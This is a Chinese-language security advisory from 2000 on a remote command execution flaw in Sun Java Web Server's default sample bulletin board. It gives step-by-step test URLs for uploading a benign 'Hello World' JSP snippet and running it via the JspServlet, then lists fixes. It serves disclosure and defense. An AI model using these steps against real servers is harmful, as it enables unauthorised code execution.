Sun Java Web服务器远程可执行命令漏洞
Sun Java Web服务器远程可执行命令漏洞漏洞发布时间:2000-7-13 17:41:00
漏 洞 描 述:
在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞,可以远程执行任意命令。
漏洞测试方法如下:
下面的例子将显示如何上载和执行该代码,而在服务器上显示"Hello World"。
输入下面的JSP代码将打印出"Hello World":
<% String s="Hello World"; %>
<%=s %>
通过下面的公告版连接Post这段代码:
http://jws.site/examples/applications/bboard/bboard_frames.html
检验是否该代码真正的上载了:
http://jws.site/board.html
通过执行下面的连接编译和执行该代码:
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html
解 决 方 法:
仔细按照Java Web Server手册中的"How to secure a web site that uses the Java Web Server" 一章进行设置,或者参考下面连接:
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html
或者简单的移除默认安装的这些样板文件。
↓相关文章:
- · <试验>win2k在apache1.3上配置tomcat3.1
- · 在windows2000 server中文版上安装apache <原创>
- · EJB概述(上)
- · WebSphere快速入门(15)
- · EJB内部资参1
- · EJB内部资参3
- · JRun常见问题回答 (JRun 中文 FAQ)
- · 真正的apache,tomcat,mod_jk安装指南 原创
- · java bean 与 ejb的区别
- · 将 Microsoft 的 Internet Information Server 用作 Java servlet 引擎 一 (给学过ASP的朋友)
- · j2ee doc 翻译系列之二
- · j2ee的jdbc配置指南(二 ) 连接sql server 数据库
- · ejb一则,franzy@163.net多多交流哦
- · WebSphere快速入门(19)
- · WebSphere快速入门(21)
- · WebSphere快速入门(1)
- · WebSphere快速入门(3)
- · WebSphere快速入门(5)
- · WebSphere快速入门(7)
- · WebSphere快速入门(9)
- · WebSphere快速入门(10)
- · WebSphere快速入门(11)
- · WebSphere快速入门(13)
- · 第三部分:布署和使用 Enterprise JavaBeans 组件(一)(转)
- · 第二部分:EJB 编程模型(转)
- · JavaBean 与 Enterprise JavaBean:有什么不同?(转)
- · 全面研读 EJB 2.0
- · Resin与IIS结合的一些补充技巧
- · 使用JAVA开发CORBA应用
- · WIN2000 下JSP环境的建立(IIS+resin+j2sdk)
- · bea weblgic中介绍的一个jsp调用ejb的好例子,相当详细。
- · jsp与ejb通信 (转)
- · WebSphere快速入门(17)
- · Weblogic中使用Servlet
- · WebLogic6.0中Ejb的使用
- · Tomcat中文手册(1)_转
- · APACHE+TOMCAT+ORACLE安装指南(少爷原创
- · weblogic文档大全(URL)
- · 分布式对话服务器的管理(2)
- · 分布式对话服务器的管理(4)
- · 分布式对话服务器的管理(6)
- · 无状态Enterprise JavaBeans的观点
- · NT下安装JSP
- · Weblogic6.0部署和配置WEB应用程序(4)
- · Weblogic6.0部署和配置WEB应用程序(6)